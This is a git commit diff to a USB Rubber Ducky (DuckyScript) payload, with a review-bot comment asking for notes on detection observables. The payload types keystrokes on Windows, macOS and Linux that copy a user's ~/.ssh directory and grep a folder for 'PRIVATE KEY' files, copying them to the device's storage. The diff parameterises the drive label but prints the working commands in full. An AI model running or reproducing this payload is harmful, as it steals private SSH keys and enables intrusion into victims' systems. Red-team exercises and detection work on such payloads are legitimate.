making requested changes

pull/442/head
Thomas Gruebl 2024-05-18 10:16:58 +02:00
parent c1e4956391
commit f134a9bd65
2 changed files with 18 additions and 10 deletions


@ -15,6 +15,10 @@ Requirements: DuckyScript 3.0, PayloadStudio v1.3.1
`DEFINE #PARENT_DIR Desktop`
- You must define your ducky drive label:
`DEFINE #DUCKY_DRIVE_LABEL DUCKY`
- You can switch between operating systems by changing the following bools:
`DEFINE #WINDOWS TRUE`
@ -23,4 +27,4 @@ Requirements: DuckyScript 3.0, PayloadStudio v1.3.1
`DEFINE #LINUX FALSE`
Alternatively, you may replace the conditional compilation flags with the OS_DETECTION EXTENSION.
Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE). DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.


@ -39,11 +39,15 @@ ATTACKMODE HID STORAGE
$_JITTER_ENABLED = TRUE
REM Define OS - Alternatively replace this with the OS_DETECTION EXTENSION
REM Define OS - Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE).
REM DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.
DEFINE #WINDOWS TRUE
DEFINE #MACOS FALSE
DEFINE #LINUX FALSE
REM Define Rubber Ducky Drive Label
DEFINE #DUCKY_DRIVE_LABEL DUCKY
REM Using "Desktop" as a sample directory
DEFINE #PARENT_DIR Desktop
@ -62,20 +66,20 @@ IF_DEFINED_TRUE #MACOS
REM Create exfiltration directory + add some extra delay to give the rubber ducky time to mount storage
DELAY 2000
STRING mkdir /Volumes/DUCKY/ssh_exfiltration
STRING mkdir /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER
DELAY 100
REM Method 1: Copy ~/.ssh dir
STRING cp .ssh/* /Volumes/DUCKY/ssh_exfiltration
STRING cp .ssh/* /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER
DELAY 1000
REM Method 2: Recursively search a parent directory for an ssh key pattern
STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/DUCKY/ssh_exfiltration; done;
STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;
DELAY 50
ENTER
@ -100,7 +104,7 @@ IF_DEFINED_TRUE #WINDOWS
REM Method 1: Copy ~/.ssh dir
GUI r
DELAY 500
STRING powershell "$vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING mkdir $vol':\'ssh_exfiltration\;
STRING cp -r $env:USERPROFILE\.ssh\* $vol':\'ssh_exfiltration\; Start-Sleep -Seconds 0.5"
DELAY 100
@ -110,7 +114,7 @@ IF_DEFINED_TRUE #WINDOWS
REM Method 2: Recursively search a parent directory for an ssh key pattern
GUI r
DELAY 100
STRING powershell "$vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING $matches=(findstr /MSPI 'PRIVATE KEY' $env:USERPROFILE\#PARENT_DIR\*);
STRING $split_matches=$matches -split '`n';
STRING foreach ($line in $split_matches) { cp $line $vol':\'ssh_exfiltration\ }"
@ -135,16 +139,16 @@ IF_DEFINED_TRUE #LINUX
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRINGLN mkdir /media/$USER_NAME/DUCKY/ssh_exfiltration
STRINGLN mkdir /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 100
REM Method 1: Copy ~/.ssh dir
STRINGLN cp .ssh/* /media/$USER_NAME/DUCKY/ssh_exfiltration
STRINGLN cp .ssh/* /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 1000
REM Method 2: Recursively search a parent directory for an ssh key pattern
STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/DUCKY/ssh_exfiltration; done;
STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;
DELAY 3000
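Review bot: The payload header now documents how to set the drive label but still says nothing about what a run leaves on the host, which a team replaying this in an exercise needs to check its detections; the two Windows hunks are the clearest case. A comment beside them such as `REM Observable: powershell started from the Run dialog with Get-Volume -FileSystemLabel, then a copy out of $env:USERPROFILE\.ssh to a removable volume` would cover it. The macOS and Linux blocks type their `mkdir`/`cp`/`grep` lines into a shell, so they presumably land in shell history too, and that is worth a matching REM. Separately, the added `REM DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.` reads as if each setting were broken; `REM Set exactly one of #WINDOWS, #MACOS, #LINUX to TRUE; enabling more than one at once is not supported.` says what is meant. The IF_DEFINED_TRUE blocks begin and end outside the hunks shown.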